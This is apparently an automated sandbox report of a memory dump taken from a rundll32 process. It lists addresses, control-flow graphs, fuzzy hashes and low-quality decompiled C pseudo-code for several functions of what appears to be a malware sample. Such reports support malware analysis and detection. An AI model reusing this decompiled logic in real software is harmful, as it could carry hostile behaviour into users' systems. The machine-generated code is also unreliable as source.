                                                                                                                                                                                                                                    0x04c33e49
                                                                                                                                                                                                                                    0x04c33e54
                                                                                                                                                                                                                                    0x04c33e5b
                                                                                                                                                                                                                                    0x04c33e5e
                                                                                                                                                                                                                                    0x04c33f4d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33e64
                                                                                                                                                                                                                                    0x04c33e64
                                                                                                                                                                                                                                    0x04c33e69
                                                                                                                                                                                                                                    0x04c33e72
                                                                                                                                                                                                                                    0x04c33e77
                                                                                                                                                                                                                                    0x04c33e80
                                                                                                                                                                                                                                    0x04c33ea3
                                                                                                                                                                                                                                    0x04c33e82
                                                                                                                                                                                                                                    0x04c33e98
                                                                                                                                                                                                                                    0x04c33e9a
                                                                                                                                                                                                                                    0x04c33e9a
                                                                                                                                                                                                                                    0x04c33ea6
                                                                                                                                                                                                                                    0x04c33f41
                                                                                                                                                                                                                                    0x04c33f44
                                                                                                                                                                                                                                    0x04c33f4e
                                                                                                                                                                                                                                    0x04c33f4e
                                                                                                                                                                                                                                    0x04c33f53
                                                                                                                                                                                                                                    0x04c33f55
                                                                                                                                                                                                                                    0x04c33f55
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33eac
                                                                                                                                                                                                                                    0x04c33eb3
                                                                                                                                                                                                                                    0x04c33ef4
                                                                                                                                                                                                                                    0x04c33f05
                                                                                                                                                                                                                                    0x04c33f1b
                                                                                                                                                                                                                                    0x04c33f1f
                                                                                                                                                                                                                                    0x04c33f24
                                                                                                                                                                                                                                    0x04c33f2a
                                                                                                                                                                                                                                    0x04c33f37
                                                                                                                                                                                                                                    0x04c33f37
                                                                                                                                                                                                                                    0x04c33f3c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33f3c
                                                                                                                                                                                                                                    0x04c33eb5
                                                                                                                                                                                                                                    0x04c33eba
                                                                                                                                                                                                                                    0x04c33ec3
                                                                                                                                                                                                                                    0x04c33ec8
                                                                                                                                                                                                                                    0x04c33ecc
                                                                                                                                                                                                                                    0x04c33eef
                                                                                                                                                                                                                                    0x04c33ece
                                                                                                                                                                                                                                    0x04c33ee4
                                                                                                                                                                                                                                    0x04c33ee6
                                                                                                                                                                                                                                    0x04c33ee6
                                                                                                                                                                                                                                    0x04c33ef2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33ef2
                                                                                                                                                                                                                                    0x04c33ea6

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: b43c034868cfd7f9715bf18adf1af4f81cc67b7c048f1edb02cd01131c642014
                                                                                                                                                                                                                                    • Instruction ID: 9d387f1ebfe547c91a2c4aab81b31bbec42ba792354114a8c996ec2b7d9ed955
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b43c034868cfd7f9715bf18adf1af4f81cc67b7c048f1edb02cd01131c642014
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B415072A01258AFEB11EFE4CC84DEE7BBEEF08746F044165B905A7120D675EE449BA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C3163F, Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 310 4c3163f-4c3168b 312 4c31691-4c316bd 310->312 313 4c317af-4c317b2 310->313 319 4c316c3-4c316cf call 4c32436 312->319 320 4c317ac 312->320 314 4c317b4 313->314 315 4c317bd-4c317c0 313->315 314->315 317 4c317c2 315->317 318 4c317cb-4c317d2 315->318 317->318 319->320 323 4c316d5-4c316e5 319->323 320->313 323->320 325 4c316eb-4c31711 323->325 325->320 328 4c31717-4c3172b 325->328 330 4c31769-4c3176c 328->330 331 4c3172d-4c31730 328->331 333 4c317a3-4c317a8 330->333 334 4c3176e-4c31773 330->334 331->330 332 4c31732-4c31749 331->332 339 4c31760 332->339 340 4c3174b-4c31754 call 4c352f9 332->340 333->320 334->333 335 4c31775-4c31780 call 4c31a70 334->335 338 4c31785-4c31789 335->338 338->333 341 4c3178b-4c31790 338->341 339->330 340->339 346 4c31756-4c3175e call 4c32436 340->346 343 4c31792-4c3179c 341->343 344 4c3179e 341->344 343->333 344->333 346->339
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: c02eaef508261465181cf279662d257f69d0c803da85f324da57aa78124c879d
                                                                                                                                                                                                                                    • Instruction ID: dbe9e1bb92d9f7b5050453583012f2e179f3fb0878b88ca9ce7abfb56fd25053
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c02eaef508261465181cf279662d257f69d0c803da85f324da57aa78124c879d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6951317A900209EFDB00DFE8C8849AEB7F7FF89341B188869E505EB210DB35AD45CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C36786, Relevance: .2, Instructions: 150COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 349 4c36786-4c367b2 call 4c3a7bc 353 4c36913-4c36919 349->353 354 4c367b8-4c36808 call 4c3b0c8 349->354 358 4c3691c-4c36923 353->358 361 4c36883-4c36888 354->361 362 4c3680a-4c3680d 354->362 363 4c36889-4c3688d 361->363 364 4c36818 362->364 365 4c3680f call 4c373fd 362->365 366 4c3688f-4c36891 363->366 367 4c3689d-4c368a1 363->367 369 4c36822 364->369 370 4c36814-4c36816 365->370 366->367 367->363 371 4c368a3-4c368ac 367->371 372 4c36825-4c36829 369->372 370->364 370->369 371->358 373 4c3683b-4c36864 call 4c38504 372->373 374 4c3682b-4c36832 372->374 379 4c36866-4c3686f 373->379 380 4c368ae-4c368b3 373->380 374->373 376 4c36834 374->376 376->373 379->372 381 4c36871-4c36880 call 4c33bf1 379->381 382 4c368d2-4c368da 380->382 383 4c368b5-4c368bb 380->383 381->361 385 4c368e0-4c368f3 call 4c3b0c8 382->385 383->361 386 4c368bd-4c368d0 call 4c3a1b0 383->386 392 4c368f8-4c36908 385->392 386->385 392->372 394 4c3690e 392->394 394->361
                                                                                                                                                                                                                                    C-Code - Quality: 21%
                                                                                                                                                                                                                                    			E04C36786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v88;
				char _v92;
				char* _t44;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t51;
				char _t55;
				intOrPtr _t59;
				signed int _t60;
				void* _t63;
				intOrPtr* _t64;
				void* _t65;
				signed int _t66;
				intOrPtr _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				void* _t75;

				_t44 =  &_v88;
				_v92 = 0;
				L04C3A7BC();
				__imp__(0, 1, 0, _t44, 0, 0x2c);
				_v44 = _t44;
				if(_t44 == 0) {
					__imp__();
					_v8 = _t44;
				} else {
					_v20 = 0;
					_v16 = 0;
					L04C3B0C8();
					_t72 = __imp__; // 0x76d7f710
					_v36 = _t44;
					_v32 = __edx;
					 *_t72(_v44,  &_v36, 0, 0, 0, 0,  *0x4c3d240, 0, 0xff676980, 0xffffffff);
					_t48 =  *0x4c3d26c; // 0xbc
					_t64 = __imp__; // 0x76d7f730
					_v40 = _t48;
					_t50 =  *_t64(2,  &_v44, 0, 0xffffffff);
					_v8 = _t50;
					if(_t50 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x4c3d24c = 5;
						} else {
							_t63 = E04C373FD(__edx); // executed
							if(_t63 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x4c3d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t66 = _v12;
						_t53 = _t66 << 4;
						_t71 = _t75 + (_t66 << 4) - 0x54;
						_t67 = _t66 + 1;
						_v24 = _t66 + 1;
						_t55 = E04C38504(_t75 + _t53 - 0x58, _t66 + 1, _t67, _t75 + _t53 - 0x58, _t71,  &_v20,  &_v16); // executed
						_v8 = _t55;
						if(_t55 != 0) {
							goto L17;
						}
						_t60 = _v24;
						_t85 = _t60 - 3;
						_v12 = _t60;
						if(_t60 != 3) {
							goto L6;
						} else {
							_v8 = E04C33BF1(_t67, _t85,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t55 - 0x10d2;
						if(_t55 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x4c3d244);
							goto L21;
						} else {
							__eflags =  *0x4c3d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t55 = E04C3A1B0();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x4c3d248);
								L21:
								L04C3B0C8();
								_v36 = _t55;
								_v32 = _t71;
								 *_t72(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t59 =  *_t64(2,  &_v44, 0, 0xffffffff);
								__eflags = _t59;
								_v8 = _t59;
								if(_t59 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t73 =  &_v92;
					_t65 = 3;
					do {
						_t51 =  *_t73;
						if(_t51 != 0) {
							__imp__( *0x4c3d238, 0, _t51);
						}
						_t73 = _t73 + 0x10;
						_t65 = _t65 - 1;
					} while (_t65 != 0);
					__imp__(_v44);
				}
				return _v8;
				goto L25;
			}





























                                                                                                                                                                                                                                    0x04c36793
                                                                                                                                                                                                                                    0x04c36798
                                                                                                                                                                                                                                    0x04c3679b
                                                                                                                                                                                                                                    0x04c367a7
                                                                                                                                                                                                                                    0x04c367af
                                                                                                                                                                                                                                    0x04c367b2
                                                                                                                                                                                                                                    0x04c36913
                                                                                                                                                                                                                                    0x04c36919
                                                                                                                                                                                                                                    0x04c367b8
                                                                                                                                                                                                                                    0x04c367c6
                                                                                                                                                                                                                                    0x04c367c9
                                                                                                                                                                                                                                    0x04c367cc
                                                                                                                                                                                                                                    0x04c367d1
                                                                                                                                                                                                                                    0x04c367da
                                                                                                                                                                                                                                    0x04c367e5
                                                                                                                                                                                                                                    0x04c367e8
                                                                                                                                                                                                                                    0x04c367ea
                                                                                                                                                                                                                                    0x04c367ef
                                                                                                                                                                                                                                    0x04c367f7
                                                                                                                                                                                                                                    0x04c36801
                                                                                                                                                                                                                                    0x04c36805
                                                                                                                                                                                                                                    0x04c36808
                                                                                                                                                                                                                                    0x04c3680d
                                                                                                                                                                                                                                    0x04c36818
                                                                                                                                                                                                                                    0x04c36818
                                                                                                                                                                                                                                    0x04c3680f
                                                                                                                                                                                                                                    0x04c3680f
                                                                                                                                                                                                                                    0x04c36816
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c36816
                                                                                                                                                                                                                                    0x04c36822
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c36825
                                                                                                                                                                                                                                    0x04c36829
                                                                                                                                                                                                                                    0x04c36834
                                                                                                                                                                                                                                    0x04c36834
                                                                                                                                                                                                                                    0x04c3683b
                                                                                                                                                                                                                                    0x04c36844
                                                                                                                                                                                                                                    0x04c3684b
                                                                                                                                                                                                                                    0x04c36854
                                                                                                                                                                                                                                    0x04c36857
                                                                                                                                                                                                                                    0x04c3685a
                                                                                                                                                                                                                                    0x04c36861
                                                                                                                                                                                                                                    0x04c36864
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c36866
                                                                                                                                                                                                                                    0x04c36869
                                                                                                                                                                                                                                    0x04c3686c
                                                                                                                                                                                                                                    0x04c3686f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c36871
                                                                                                                                                                                                                                    0x04c36880
                                                                                                                                                                                                                                    0x04c36880
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c368ae
                                                                                                                                                                                                                                    0x04c368ae
                                                                                                                                                                                                                                    0x04c368b3
                                                                                                                                                                                                                                    0x04c368d2
                                                                                                                                                                                                                                    0x04c368d4
                                                                                                                                                                                                                                    0x04c368d9
                                                                                                                                                                                                                                    0x04c368da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c368b5
                                                                                                                                                                                                                                    0x04c368b5
                                                                                                                                                                                                                                    0x04c368bb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c368bd
                                                                                                                                                                                                                                    0x04c368bd
                                                                                                                                                                                                                                    0x04c368c2
                                                                                                                                                                                                                                    0x04c368c4
                                                                                                                                                                                                                                    0x04c368c9
                                                                                                                                                                                                                                    0x04c368ca
                                                                                                                                                                                                                                    0x04c368e0
                                                                                                                                                                                                                                    0x04c368e0
                                                                                                                                                                                                                                    0x04c368e8
                                                                                                                                                                                                                                    0x04c368f3
                                                                                                                                                                                                                                    0x04c368f6
                                                                                                                                                                                                                                    0x04c36901
                                                                                                                                                                                                                                    0x04c36903
                                                                                                                                                                                                                                    0x04c36905
                                                                                                                                                                                                                                    0x04c36908
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3690e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3690e
                                                                                                                                                                                                                                    0x04c36908
                                                                                                                                                                                                                                    0x04c368bb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c368b3
                                                                                                                                                                                                                                    0x04c36883
                                                                                                                                                                                                                                    0x04c36885
                                                                                                                                                                                                                                    0x04c36888
                                                                                                                                                                                                                                    0x04c36889
                                                                                                                                                                                                                                    0x04c36889
                                                                                                                                                                                                                                    0x04c3688d
                                                                                                                                                                                                                                    0x04c36897
                                                                                                                                                                                                                                    0x04c36897
                                                                                                                                                                                                                                    0x04c3689d
                                                                                                                                                                                                                                    0x04c368a0
                                                                                                                                                                                                                                    0x04c368a0
                                                                                                                                                                                                                                    0x04c368a6
                                                                                                                                                                                                                                    0x04c368a6
                                                                                                                                                                                                                                    0x04c36923
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 00b1e5946dbc9184d2c3ecca9b79641a024c43d3cce192bc2dd26874098b309a
                                                                                                                                                                                                                                    • Instruction ID: 48ce6cff417ba93398e5ffb0920d9757949738d6c3886166f765129e705a141d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00b1e5946dbc9184d2c3ecca9b79641a024c43d3cce192bc2dd26874098b309a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01517CB5901228BBDF20DF94DC44EEEBFB9EF49326F204116F811B2180D775AA40DBA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C39152, Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 395 4c39152-4c39178 397 4c39246-4c3924c 395->397 398 4c3917e-4c3919b call 4c33aef 395->398 401 4c391a1-4c391a6 398->401 402 4c3923d-4c39242 398->402 403 4c391a8-4c391ab 401->403 404 4c391be-4c391c0 401->404 402->397 403->404 406 4c391ad-4c391bc 403->406 404->402 405 4c391c2-4c391e0 404->405 407 4c391e4-4c391e8 405->407 406->404 409 4c39216-4c3921b 407->409 410 4c391ea-4c391f6 call 4c37c14 407->410 412 4c39223-4c3922c 409->412 413 4c3921d-4c3921f 409->413 410->409 418 4c391f8-4c391fd 410->418 415 4c39233-4c39236 412->415 416 4c3922e 412->416 413->412 415->402 417 4c39238 415->417 416->415 417->402 418->409 419 4c391ff-4c39202 418->419 419->409 420 4c39204-4c39214 419->420 420->409
                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E04C39152(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E04C33AEF(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x4c3d27c; // 0xa6a5a8
						_t20 = _t68 + 0x4c3e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E04C37C14(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6; // 0x7414d5b0
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                                                                                                                                                                                                    0x04c39158
                                                                                                                                                                                                                                    0x04c3915b
                                                                                                                                                                                                                                    0x04c3916b
                                                                                                                                                                                                                                    0x04c39174
                                                                                                                                                                                                                                    0x04c39178
                                                                                                                                                                                                                                    0x04c39246
                                                                                                                                                                                                                                    0x04c3924c
                                                                                                                                                                                                                                    0x04c3924c
                                                                                                                                                                                                                                    0x04c39192
                                                                                                                                                                                                                                    0x04c39197
                                                                                                                                                                                                                                    0x04c3919b
                                                                                                                                                                                                                                    0x04c391a1
                                                                                                                                                                                                                                    0x04c391a6
                                                                                                                                                                                                                                    0x04c391ad
                                                                                                                                                                                                                                    0x04c391bc
                                                                                                                                                                                                                                    0x04c391bc
                                                                                                                                                                                                                                    0x04c391c0
                                                                                                                                                                                                                                    0x04c391c2
                                                                                                                                                                                                                                    0x04c391ce
                                                                                                                                                                                                                                    0x04c391d9
                                                                                                                                                                                                                                    0x04c391e4
                                                                                                                                                                                                                                    0x04c391e8
                                                                                                                                                                                                                                    0x04c391f2
                                                                                                                                                                                                                                    0x04c391f6
                                                                                                                                                                                                                                    0x04c391f8
                                                                                                                                                                                                                                    0x04c391fd
                                                                                                                                                                                                                                    0x04c39204
                                                                                                                                                                                                                                    0x04c39214
                                                                                                                                                                                                                                    0x04c39214
                                                                                                                                                                                                                                    0x04c391fd
                                                                                                                                                                                                                                    0x04c391f6
                                                                                                                                                                                                                                    0x04c39216
                                                                                                                                                                                                                                    0x04c3921b
                                                                                                                                                                                                                                    0x04c39220
                                                                                                                                                                                                                                    0x04c39220
                                                                                                                                                                                                                                    0x04c39226
                                                                                                                                                                                                                                    0x04c3922c
                                                                                                                                                                                                                                    0x04c39231
                                                                                                                                                                                                                                    0x04c39231
                                                                                                                                                                                                                                    0x04c39236
                                                                                                                                                                                                                                    0x04c3923b
                                                                                                                                                                                                                                    0x04c3923b
                                                                                                                                                                                                                                    0x04c39236
                                                                                                                                                                                                                                    0x04c391c0
                                                                                                                                                                                                                                    0x04c3923d
                                                                                                                                                                                                                                    0x04c39243
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 25a97b9a5a60192edb3f4f8a165e3db89ddc90547f71c48394f4f338e114e70c
                                                                                                                                                                                                                                    • Instruction ID: da817ced5ade57a79397a5ef7d1ca2a9f18b54d2122286d21e8675f0e243d0b8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25a97b9a5a60192edb3f4f8a165e3db89ddc90547f71c48394f4f338e114e70c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11317CB6900518AFCB21DFA5C888CAFBB7AFFC97417144658F8159B210E372ED51DBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C3269C, Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 422 4c3269c-4c326b0 423 4c326b2-4c326b7 422->423 424 4c326ba-4c326cc call 4c36b43 422->424 423->424 427 4c32720-4c3272d 424->427 428 4c326ce-4c326d2 424->428 429 4c3272f-4c32746 427->429 430 4c326d9-4c326de 428->430 433 4c32784-4c327a6 429->433 434 4c32748-4c32759 429->434 430->429 432 4c326e0-4c326f0 430->432 432->429 437 4c326f2-4c326ff 432->437 434->433 438 4c3275b-4c32764 434->438 441 4c32701-4c3270d call 4c32496 437->441 442 4c3270f-4c3271e 437->442 443 4c32766-4c32772 call 4c32496 438->443 444 4c32775-4c32778 438->444 441->442 442->429 443->444 444->433
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f2b38151c1864fd696f353188120d6b3288afa8bcacc50723026644f6deddc50
                                                                                                                                                                                                                                    • Instruction ID: 31ba1cf31bff65f8dcafad15fc5726209a48a3818f3c5dc889e1e7230ff45260
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2b38151c1864fd696f353188120d6b3288afa8bcacc50723026644f6deddc50
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8331E776A00205AFEB11DF69D881BAEB7FAFF48252F144069E405D7250EB34EE459B10
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C33AEF, Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 450 4c33aef-4c33b30 452 4c33b32-4c33b3b 450->452 453 4c33bb1-4c33bb7 450->453 454 4c33b7b-4c33b7e 452->454 455 4c33b3d-4c33b4d 452->455 456 4c33b80-4c33b8f 454->456 457 4c33bdb 454->457 460 4c33b58-4c33b70 455->460 461 4c33b4f-4c33b56 455->461 466 4c33b91 456->466 467 4c33bba-4c33bd9 456->467 459 4c33bdd-4c33be0 457->459 462 4c33be2-4c33bef 459->462 463 4c33b98-4c33b9a 459->463 470 4c33b74-4c33b79 460->470 465 4c33ba3-4c33ba6 461->465 462->453 463->465 468 4c33b9c 463->468 465->453 469 4c33ba8 465->469 466->463 467->459 468->465 469->453 470->454 470->465
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
